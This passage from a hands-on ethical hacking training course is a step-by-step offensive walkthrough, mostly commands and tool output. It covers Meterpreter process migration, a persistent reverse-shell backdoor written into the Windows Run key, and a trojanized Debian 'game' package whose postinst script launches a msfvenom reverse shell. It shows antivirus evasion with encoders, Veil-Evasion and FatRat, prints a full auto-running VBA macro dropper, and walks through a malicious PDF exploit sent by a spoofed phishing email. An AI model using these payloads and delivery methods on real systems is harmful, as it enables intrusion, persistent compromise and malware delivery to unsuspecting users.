PID PPID Name Arch Session User Path

--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM

TRANCHULAS | www.tranchulas.com 131

Hands-On Ethical Hacking and Penetration Testing Training Course

132 828 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE

C:\WINDOWS\System32\wbem\wmiprvse.exe
440 536 services.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\services.exe
516 4 smss.exe x86 0 NT AUTHORITY\SYSTEM
\SystemRoot\System32\smss.exe
580 516 csrss.exe x86 0 NT AUTHORITY\SYSTEM
\??\C:\WINDOWS\system32\csrss.exe
604 516 winlogon.exe x86 0 NT AUTHORITY\SYSTEM
\??\C:\WINDOWS\system32\winlogon.exe
648 604 services.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\services.exe
660 604 lsass.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\lsass.exe
828 648 svchost.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\svchost.exe
928 648 svchost.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\System32\svchost.exe
1120 648 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE
C:\WINDOWS\System32\svchost.exe
1164 648 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE
C:\WINDOWS\System32\svchost.exe
1216 928 wuauclt.exe x86 0 IMP-SERVER2\Administrator
C:\WINDOWS\System32\wuauclt.exe
1348 1304 explorer.exe x86 0 IMP-SERVER2\Administrator
C:\WINDOWS\Explorer.EXE
1356 604 logon.scr x86 0 IMP-SERVER2\Administrator
C:\WINDOWS\System32\logon.scr
1460 648 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\spoolsv.exe
1528 1348 vmtoolsd.exe x86 0 IMP-SERVER2\Administrator C:\Program
Files\VMware\VMware Tools\vmtoolsd.exe
1784 648 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program
Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1884 648 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program
Files\VMware\VMware Tools\vmtoolsd.exe

Now we will try to migrate to another process. Note the PID of the process to which you want to
migrate

meterpreter > migrate 828

[*] Migrating from 928 to 828...
[*] Migration completed successfully.

TRANCHULAS | www.tranchulas.com 132

Hands-On Ethical Hacking and Penetration Testing Training Course

Persistent Backdoors
After compromising a vulnerable machine, we may want to reconnect back later to our
compromised system. It is a good idea to leave yourself an easier way back into the system. If
the service is patched or down, we can use alternate way of connection. Meterpreter has a
persistence command, that will create a Meterpreter service that will be available to you even if
the remote system is rebooted.

Once we have exploited the machine and got the meterpreter shell run persistence command

meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching exploit/multi/handler to connect to the agent

-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

There are various options present.

meterpreter > run persistence -A -i 10 -p 4434 -r 192.167.0.6

[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/IMP-
SERVER2_20170201.2933/IMP-SERVER2_20170201.2933.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.167.0.6 LPORT=4434
[*] Persistent agent script is 99663 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\XLNWIfcpRx.vbs
[*] Starting connection handler at port 4434 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\WINDOWS\TEMP\XLNWIfcpRx.vbs
[+] Agent executed with PID 1952
[*] Installing into autorun as
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\BxAakoDADlggUG

TRANCHULAS | www.tranchulas.com 133

Hands-On Ethical Hacking and Penetration Testing Training Course

[+] Installed into autorun as

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\BxAakoDADlggUG

(here -A means automatic start, matching multi/handler to connect to the agent. The -X means
the agent automatically starts when the system boots, -i 10 means the no. of seconds to wait
between each connection attempt, -p 4434 mean the port on which the Metasploit handler will
be listening and the IP on which the attacker machine is running which 192.167.0.6.
After some time, a new connection will be created

meterpreter > [*] Meterpreter session 2 opened (192.167.0.6:4434 -> 192.168.2.9:1034) at

2017-02-01 03:29:48 -0500

meterpreter > background

[*] Backgrounding session 1...
msf exploit(ms08_067_netapi) > sessions -i

Active sessions
===============

Id Type Information Connection

-- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ IMP-SERVER2 192.167.0.6:4444 ->
192.168.2.9:1033 (192.168.2.9)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ IMP-SERVER2 192.167.0.6:4434 ->
192.168.2.9:1034 (192.168.2.9)

We take our current session to the background using background command. Then we list our
sessions. We can see that there are two sessions. One was initial on port 4444 and the other is
our persistent backdoor on port 4434.
We now reboot the system and create a handler. As soon as the system reboots we will get a
reverse shell.

meterpreter > reboot

Rebooting...

As soon as system reboots we will get a new connection

msf exploit(handler) > [*] Meterpreter session 5 opened (192.167.0.6:4434 ->

192.168.2.9:1027) at 2017-02-01 03:41:36 -0500

msf exploit(handler) > sessions -i

TRANCHULAS | www.tranchulas.com 134

Hands-On Ethical Hacking and Penetration Testing Training Course

Active sessions
===============

Id Type Information Connection

-- ---- ----------- ----------
5 meterpreter x86/windows IMP-SERVER2\Administrator @ IMP-SERVER2
192.167.0.6:4434 -> 192.168.2.9:1027 (192.168.2.9)

Linux Trojan
In order to demonstrate that client side attacks and trojans are not exclusive to the Windows
world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on
Linux.
We first need to download the package that we are going to infect and move it to a temporary
working directory. In our example, we will use the package 'chromium', a game available on the
Ubuntu store.

root@kali:~/Desktop# apt-get --download-only install chromium

The package is downloaded in /var/cache/apt/archives directory. Now we need to make a

temporary directory to work in. We will create a directory and copy our package in the directory.

root@kali:~# mkdir /tmp/evil

root@kali:~# cd /tmp/evil/
root@kali:/tmp/evil# mv /var/cache/apt/archives/chromium_46.0.2490.71-
1~deb8u1_i386.deb /tmp/evil/

Next, we need to extract the package to a working directory and create a DEBIAN directory to
hold our additional added "features".

root@kali:/tmp/evil# mkdir work

root@kali:/tmp/evil# dpkg -x chromium_46.0.2490.71-1~deb8u1_i386.deb work/
root@kali:/tmp/evil# mkdir work/DEBIAN
root@kali:/tmp/evil# cd work/
root@kali:/tmp/evil/work# cd DEBIAN/

In the 'DEBIAN' directory, create a file named 'control' that contains the following:

TRANCHULAS | www.tranchulas.com 135

Hands-On Ethical Hacking and Penetration Testing Training Course

root@kali/tmp/evil/work/DEBIAN# nano control

Package: Chromium
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: An indulging game with good graphics and gameplay

We also need to create a post-installation script that will execute our binary. In our 'DEBIAN',
we'll create a file named 'postinst' that contains the following:

root@kali:/tmp/evil/work/DEBIAN# nano postinst

#!bin/sh

sudo chmod 2755 /usr/bin/chromium_score && /usr/bin/chromium_score &

/usr/bin/chromium &

Now we'll create our malicious payload. We'll be creating a reverse shell to connect back to us
named 'chromium_scores'.

root@kali:~/Desktop# msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.3.109

LPORT=443 X > /tmp/evil/work/usr/bin/chromium_score

We'll now make our post-installation script executable and build our new package. The built file
will be named 'work.deb' so we will want to change that to 'chromium.deb' and copy the
package to our web root directory.

root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst

root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `chromium' in `/tmp/evil/work.deb'.

We will need to set up the Metasploit multi/handler to receive the incoming connection.

TRANCHULAS | www.tranchulas.com 136

Hands-On Ethical Hacking and Penetration Testing Training Course

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.109
LHOST => 192.168.3.109
msf exploit(handler) > set LPORT 443
LPORT => 443

On our Ubuntu victim, we have somehow convinced the user to download and install our
awesome new game.

tester@ubuntu:~/ sudo dpkg –I chromium.deb

When the victim plays the game, we have got our shell.

Bypassing Antivirus

Using msfvenom

Most Windows based systems currently run some form of anti-virus protection due to the
widespread pervasiveness of malicious software targeting the platform. We will encode our
produced executable in an attempt to make it harder to discover. We will use msfvenom for this.
There are various enchoders available which can be used. We will use shikata_ga_nai. To check
which encoders are available, use the following command:

root@kali:~/Desktop# msfvenom -l encoders

root@kali:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform

win LHOST=192.168.3.109 LPORT=443 -e x86/shikata_ga_nai -i 1 -f exe >
/root/Desktop/game2.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes

Following are options for msfvenom:

Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use
custom payloads
-l, --list [module_type] List a module type example: payloads, encoders,
nops, all

TRANCHULAS | www.tranchulas.com 137

Hands-On Ethical Hacking and Penetration Testing Training Course

-n, --nopsled <length> Prepend a nopsled of [length] size on to the

payload
-f, --format <format> Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch <architecture> The architecture to use
--platform <platform> The platform of the payload
-s, --space <length> The maximum size of the resulting payload
-b, --bad-chars <list> The list of characters to avoid example:
'\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to
include
-x, --template <path> Specify a custom executable file to use as a
template
-k, --keep Preserve the template behavior and inject the
payload as a new thread
--payload-options List the payload's standard options
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for
certain output formats
-h, --help Show this message
--help-formats List available formats

Copy the game2.exe to windows PC and run it. You will get a shell
If it still gets discovered, by antivirus, we’ll try something different. Use different encoders, two
of which we will tell it to run through 10 times each. This is about as much encoding as we can
do and still have a working binary.

Using Veil-Evasion

Veil is used to bypass AV and generate payloads. It uses various methods to encrypt and
obfuscate the payload to avoid detection.
To install veil-evasion use the following commands:

root@kali:~# apt-get install veil-evasion

Press Y. It will install the required files. Install all the dependencies it prompts.

Now we are ready to use Veil-evasion. Type veil on terminal. It will prompt you to install veil-
evasion. Select Yes. Type list to get a list of all available payloads.

[menu>>]: list
=========================================================================
Veil-Evasion | [Version]: 2.28.2
=========================================================================
TRANCHULAS | www.tranchulas.com 138
Hands-On Ethical Hacking and Penetration Testing Training Course

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

=========================================================================
[*] Available Payloads:

1) auxiliary/coldwar_wrapper
2) auxiliary/macro_converter
3) auxiliary/pyinstaller_wrapper

4) c/meterpreter/rev_http
5) c/meterpreter/rev_http_service
6) c/meterpreter/rev_tcp
7) c/meterpreter/rev_tcp_service
8) c/shellcode_inject/flatc

9) cs/meterpreter/rev_http
10) cs/meterpreter/rev_https
11) cs/meterpreter/rev_tcp
12) cs/shellcode_inject/base64_substitution
13) cs/shellcode_inject/virtual

There are large number of payloads available. Use the set command to use a specific payload.

[menu>>]: use 6
========================================================================
Veil-Evasion | [Version]: 2.28.2
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

Payload: c/meterpreter/rev_tcp loaded

Required Options:

Name Current Value Description

---- ------------- -----------
COMPILE_TO_EXE Y Compile to an executable
LHOST IP of the Metasploit handler
LPORT 4444 Port of the Metasploit handler

Available Commands:

TRANCHULAS | www.tranchulas.com 139

Hands-On Ethical Hacking and Penetration Testing Training Course

set Set a specific option value

info Show information about the payload
options Show payload's options
generate Generate payload
back Go to the main menu
exit exit Veil-Evasion

[c/meterpreter/rev_tcp>>]: set LHOST 192.168.3.103

[i] LHOST => 192.168.3.103

Generate the file. Give it any name you like

[ruby/meterpreter/rev_tcp>>]: generate
=========================================================================
[>] Please enter the base name for output files (default is 'payload'): myfile1

[*] Executable written to: /var/lib/veil-evasion/output/compiled/myfile1.exe

Language: c
Payload: c/meterpreter/rev_tcp
Required Options: COMPILE_TO_EXE=Y LHOST=192.168.3.103 LPORT=4444
Payload File: /var/lib/veil-evasion/output/source/myfile1.c
Handler File: /var/lib/veil-evasion/output/handlers/myfile1_handler.rc
[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner! ;)

The executable has been saved at the location mentioned. We can use encrypted payloads as
well. Now we need to start a handler in msfconsole. Type msfconsole in terminal

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.103
LHOST => 192.168.3.103
msf exploit(handler) > set LPORT 4444
LPORT => 8080
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.3.103:8080

[*] Starting the payload handler...

TRANCHULAS | www.tranchulas.com 140

Hands-On Ethical Hacking and Penetration Testing Training Course

We have copied our exe to the targets windows machine and when the user clicks on it we get a
reverse connection.

FatRat

An easy tool to generate undetectable backdoors and for post exploitation attacks like. This tool
compiles a malware with popular payloads and then the compiled malware can be executed on
windows, android, mac.

To download FatRat use the following command:

root@kali:~# git clone https://github.com/Screetsec/TheFatRat.git

After it has been downloaded, extract files from the zipped folder and go in the FatRat directory.

To give the permission to the executable run the following commands:

root@kali:~# chmod +x powerfull.sh

root@kali:~# chmod +x fatrat
root@kali:~# chmod +x setup.sh

To install FatRat use the following command:

root@kali:~# ./setup.sh

Now we are ready to use FatRat. Type fatrat on terminal to start FatRat. It will list down all the
available modules that can be used.

Creating Exe file with FatRat

To create a binary executable file, select any module of your choice and enter the number.
We will use option 6 “Create Fud Backdoor 1000% with PwnWinds [Excelent]”. Type 6 in terminal.

TRANCHULAS | www.tranchulas.com 141

Hands-On Ethical Hacking and Penetration Testing Training Course

[01] Create Backdoor with msfvenom

[02] Create Fud 100% Backdoor with Fudwin 1.0
[03] Create Fud Backdoor with Avoid v1.2
[04] Create Fud Backdoor with backdoor-factory [embed]
[05] Backdooring Original apk [Instagram, Line,etc]
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
[07] Create Backdoor For Office with Microsploit
[08] Load/Create auto listeners
[09] Jump to msfconsole
[10] Searchsploit
[11] File Pumper [Increase Your Files Size]
[12] Configure Default Lhost & Lport
[13] Cleanup
[14] Help
[15] Credits
[16] Exit

┌─[TheFatRat]──[~]─[menu]:
└─────► 6

You will then see a new menu appear similar to the menu given below. Choose option 6 “Create
Backdoor with C / Meterperter_reverse_tcp (FUD 97%)”

[1] Create a bat file+Powershell (FUD 100%)

[2] Create exe file with C# + Powershell (FUD 100%)
[3] Create exe file with apache + Powershell (FUD 100%)
[4] Create exe file with C + Powershell (FUD 98 %)
[5] Create Backdoor with C + Powershell + Embed Pdf (FUD 80%)
[6] Create Backdoor with C / Meteperter_reverse_tcp (FUD 97%)
[7] Create Backdoor with C / Metasploit Staging Protocol (FUD 98%)
[8] Back to Menu

┌─[TheFatRat]──[~]─[pwnwind]:
└─────► 6

It will then prompt you to enter LHOST, LPORT and file name.

Your local IPV4 address is : 192.168.3.103

Your local IPV6 address is : fe80::20c:29ff:fe3d:718a

TRANCHULAS | www.tranchulas.com 142

Hands-On Ethical Hacking and Penetration Testing Training Course

Your public IP address is : 101.50.81.19

Your Hostname is : ntl-50-81-19.nayatel.com

Set LHOST IP: 192.168.3.103

Set LPORT: 4444

Please enter the base name for output files :Myfile

It will automatically create the exe file named “Myfile”. The file would be saved automatically to
the output folder in the FatRat directory.

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

Generate Backdoor
+------------++-------------------------++-----------------------+
| Name || Descript || Your Input
+------------++-------------------------++-----------------------+
| LHOST || The Listen Addres || 192.168.3.103
| LPORT || The Listen Ports || 4444
| OUTPUTNAME || The Filename output || Myfile
| PAYLOAD || Payload To Be Used ||
+------------++-------------------------++-----------------------+

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

[+]Compiling Binary Done

Press Enter key to Contiune ...

Now we need to start a handler in msfconsole. Type msfconsole in terminal

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.103
LHOST => 192.168.3.103
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run

TRANCHULAS | www.tranchulas.com 143

Hands-On Ethical Hacking and Penetration Testing Training Course

[*] Started reverse TCP handler on 192.168.3.103:4444

[*] Starting the payload handler...

We have copied our exe to the targets windows machine and when the user clicks on it we get a
reverse connection.

Creating Malicious Word file with FatRat

To create a malicious word file, select option 7 “Create Backdoor For Office with Microsploit”.
Type 7 in terminal.

[01] Create Backdoor with msfvenom

[02] Create Fud 100% Backdoor with Fudwin 1.0
[03] Create Fud Backdoor with Avoid v1.2
[04] Create Fud Backdoor with backdoor-factory [embed]
[05] Backdooring Original apk [Instagram, Line,etc]
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
[07] Create Backdoor For Office with Microsploit
[08] Load/Create auto listeners
[09] Jump to msfconsole
[10] Searchsploit
[11] File Pumper [Increase Your Files Size]
[12] Configure Default Lhost & Lport
[13] Cleanup
[14] Help
[15] Credits
[16] Exit

┌─[TheFatRat]──[~]─[menu]:
└─────► 7

You will then see a new menu appear similar to the menu given below. Choose option 2 “The
Microsoft Office Macro on Windows”

TRANCHULAS | www.tranchulas.com 144

Hands-On Ethical Hacking and Penetration Testing Training Course

|1| Microsoft Stack overflow in MSCOMCTL.OCX

|2| The Microsoft Office Macro on Windows
|3| The Microsoft Office Macro on Mac OS X
|4| Apache OpenOffice on Windows (PSH)
|5| Apache OpenOffice on Linux/OSX (Python)
|6| Exit

┌─[TheFatRat]──[~]─[microsploit]:
└─────► 2

It will then prompt you to enter LHOST, LPORT, file name and the document body. Once the
document body is entered, it will ask you if you want a custom exe file backdoor. Enter n.
Afterwards, select any payload you like.

Worked on Microsoft Office on Windows

Your local IPV4 address is : 192.168.3.103

Your local IPV6 address is : fe80::20c:29ff:fe3d:718a
Your public IP address is : 101.50.81.19
Your Hostname is : ntl-50-81-19.nayatel.com

Set LHOST IP: 192.168.3.103

Set LPORT: 4444

Enter the base name for output files : MyDocFile

Enter the message for the document body (ENTER = default) : Hi This is a malicious doc file.

Are u want Use custom exe file backdoor ( y/n ): n

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

+-------------------------------------------+
| [ 1 ] windows/shell_bind_tcp |
| [ 2 ] windows/shell/reverse_tcp |
| [ 3 ] windows/meterpreter/reverse_tcp |

TRANCHULAS | www.tranchulas.com 145

Hands-On Ethical Hacking and Penetration Testing Training Course

| [ 4 ] windows/meterpreter/reverse_tcp_dns |
| [ 5 ] windows/meterpreter/reverse_http |
| [ 6 ] windows/meterpreter/reverse_https |
+-------------------------------------------+

Choose Payload :3

It will automatically create a macros enabled word document named “MyDocFile”. The file would
be saved automatically to the output folder in the FatRat directory.

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

Generate Backdoor
+------------++-------------------------++-----------------------+
| Name || Descript || Your Input
+------------++-------------------------++-----------------------+
| LHOST || The Listen Addres || 192.168.3.103
| LPORT || The Listen Ports || 4444
| OUTPUTNAME || The Filename output || MyDocFile
| PAYLOAD || Payload To Be Used || windows/meterpreter/reverse_tcp
+------------++-------------------------++-----------------------+

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]

Backdoor doc Saved To : /root /FatRat/output/MyDocFile.docm

Press [ENTER] key to return to menu

Now we need to start a handler in msfconsole. Type msfconsole in terminal and start a listener.
As soon as the user opens the malicious word document, we will get a reverse connection.

PDF Exploit
We start off by loading our msfconsole. After we are loaded we want to create a malicious PDF
that will give the victim a sense of security in opening it.

TRANCHULAS | www.tranchulas.com 146

Hands-On Ethical Hacking and Penetration Testing Training Course

We are going to be using the Adobe Reader 'util.printf()' JavaScript Function Stack Buffer
Overflow Vulnerability.
Adobe Reader is prone to stack-based buffer-overflow vulnerability because the application
fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user
running the application or crash the application, denying service to legitimate users. So we start
by creating our malicious PDF file for use in this client side attack.

msf > use exploit/windows/fileformat/adobe_utilprintf

msf exploit(adobe_utilprintf) > set FILENAME PrivacyPolicy.pdf
FILENAME => PayPolicy.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(adobe_utilprintf) > exploit

Before we send the malicious file to our victim we need to set up a listener to capture
this reverse connection. We will use msfconsole to set up our multi handler listener.

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(handler) > exploit

Now that our listener is waiting to receive its malicious payload we have to deliver this payload
to the victim and since in our information gathering we obtained the email address of the IT
Department we will use a handy little script called sendEmail to deliver this payload to
the victim. With a kung-fu one-liner, we can attach the malicious pdf, use any smtp server we
want and write a pretty convincing email from any address we want.

root@kali:~# sendEmail -t [email protected] -f [email protected] -s 192.168.1.104 -

u Pay policy renewal -a /root/.msf4/local/PrivacyPolicy.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.

We are updating the policy

TRANCHULAS | www.tranchulas.com 147

Hands-On Ethical Hacking and Penetration Testing Training Course

Sincerely,
Tech

As we can see here, the script allows us to put any FROM (-f) address, any TO (-t) address, any
SMTP (-s) server as well as Titles (-u) and our malicious attachment (-a). Once we do all that and
press enter we can type any message we want, then press CTRL+D and this will send the email
out to the victim.
Now on the victim's machine, our IT Department employee is getting in for the day and logging
into his computer to check his email.
Clicking the file opens Adobe but shows a greyed out window that never reveals a PDF.
Instead, on the attacker’s machine what is revealed.

VBScript Infection

Metasploit has a couple of built in methods you can use to infect Word and Excel documents with
malicious Metasploit payloads. You can also use your own custom payloads as well. o begin, we
first need to create our VBScript payload:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.122

LPORT=8080 -e x86/shikata_ga_nai -f vba-exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with final size 360
Payload size: 360 bytes
'**************************************************************
'*
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

TRANCHULAS | www.tranchulas.com 148

Hands-On Ethical Hacking and Penetration Testing Training Course

Sub Auto_Open()
Ufwdk12
End Sub

Sub Ufwdk12()
Dim Ufwdk7 As Integer
Dim Ufwdk1 As String
Dim Ufwdk2 As String
Dim Ufwdk3 As Integer
Dim Ufwdk4 As Paragraph
Dim Ufwdk8 As Integer
Dim Ufwdk9 As Boolean
Dim Ufwdk5 As Integer
Dim Ufwdk11 As String
Dim Ufwdk6 As Byte
Dim Juxobelrhb as String
Juxobelrhb = "Juxobelrhb"
Ufwdk1 = "RYoCwIWYs.exe"
Ufwdk2 = Environ("USERPROFILE")
ChDrive (Ufwdk2)
ChDir (Ufwdk2)
Ufwdk3 = FreeFile()
Open Ufwdk1 For Binary As Ufwdk3
For Each Ufwdk4 in ActiveDocument.Paragraphs
DoEvents
Ufwdk11 = Ufwdk4.Range.Text
If (Ufwdk9 = True) Then
Ufwdk8 = 1
While (Ufwdk8 < Len(Ufwdk11))
Ufwdk6 = Mid(Ufwdk11,Ufwdk8,4)
Put #Ufwdk3, , Ufwdk6
Ufwdk8 = Ufwdk8 + 4
Wend
ElseIf (InStr(1,Ufwdk11,Juxobelrhb) > 0 And Len(Ufwdk11) > 0) Then
Ufwdk9 = True
End If
Next
Close #Ufwdk3
Ufwdk13(Ufwdk1)
End Sub

Sub Ufwdk13(Ufwdk10 As String)

Dim Ufwdk7 As Integer

TRANCHULAS | www.tranchulas.com 149

Hands-On Ethical Hacking and Penetration Testing Training Course

Dim Ufwdk2 As String

Ufwdk2 = Environ("USERPROFILE")
ChDrive (Ufwdk2)
ChDir (Ufwdk2)
Ufwdk7 = Shell(Ufwdk10, vbHide)
End Sub

Sub AutoOpen()
Auto_Open
End Sub

Sub Workbook_Open()
Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Juxobelrhb
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&
HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E
&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69
&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&
H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H
6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H4
5&H00&H00&H4C&H01&H03&H00&H6E&H57&HA5&H7C&H00&H00&H00&H00&H00&H00
&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&
H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&…
…….. (continued)

As the output message indicates, the script contains two parts. The first part of script is created
as a macro and second part is appended into the document text itself. You need to transfer the
script to a windows machine with Microsoft Office installed.
Create a new word document and open it. Copy the payload hex code in the document.

TRANCHULAS | www.tranchulas.com 150

Hands-On Ethical Hacking and Penetration Testing Training Course

Go it to View -> Macros -> Record Macro. Select Keyboard

Close the new dialog box

TRANCHULAS | www.tranchulas.com 151

Hands-On Ethical Hacking and Penetration Testing Training Course

Stop the recording

Now go to View Macros and click on Create

TRANCHULAS | www.tranchulas.com 152

Hands-On Ethical Hacking and Penetration Testing Training Course

Paste the Macro code from Kali Linux.

Make sure you remove the previous code and paste the new one

TRANCHULAS | www.tranchulas.com 153

Hands-On Ethical Hacking and Penetration Testing Training Course

Save the file. Now we need to start a listener on the Kali Linux.

root@kali:~ msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.122
LHOST => 192.168.3.122
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > run

Send the Word file to the target, as soon as he opens the file reverse shell will be created.

TRANCHULAS | www.tranchulas.com 154

Hands-On Ethical Hacking and Penetration Testing Training Course

Weaponizing Excel Worksheets Using Veil

Veil can be used to create a PowerShell payload that can be embedded in excel document. Start
veil-evasion

root@kali:~# veil-evasion

Select powershell/shellcode_inject/virtual payload

[menu>>]: use 28

=========================================================================
Veil-Evasion | [Version]: 2.28.2
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: powershell/shellcode_inject/virtual loaded
Required Options:

Name Current Value Description

---- ------------- -----------

Available Commands:

set Set a specific option value

info Show information about the payload
options Show payload's options
generate Generate payload
back Go to the main menu
exit exit Veil-Evasion

[powershell/shellcode_inject/virtual>>]: generate
Select 1

TRANCHULAS | www.tranchulas.com 155

Hands-On Ethical Hacking and Penetration Testing Training Course

Veil-Evasion | [Version]: 2.28.2

=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

[?] Use msfvenom or supply custom shellcode?

1 - msfvenom (default)
2 - custom shellcode string
3 - file with shellcode (raw)

[>] Please enter the number of your choice: 1

Press Enter because we will be using default payload. Enter the IP address and port.

[*] Press [enter] for windows/meterpreter/reverse_tcp

[*] Press [tab] to list available payloads
[>] Please enter metasploit payload:
[>] Enter value for 'LHOST', [tab] for local IP: 192.168.3.103
[>] Enter value for 'LPORT': 8080
[>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2):

[*] Generating shellcode...

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of c file: 1425 bytes

Give the payload file a name

[>] Please enter the base name for output files (default is 'payload'): excel_file
Language: powershell
Payload: powershell/shellcode_inject/virtual
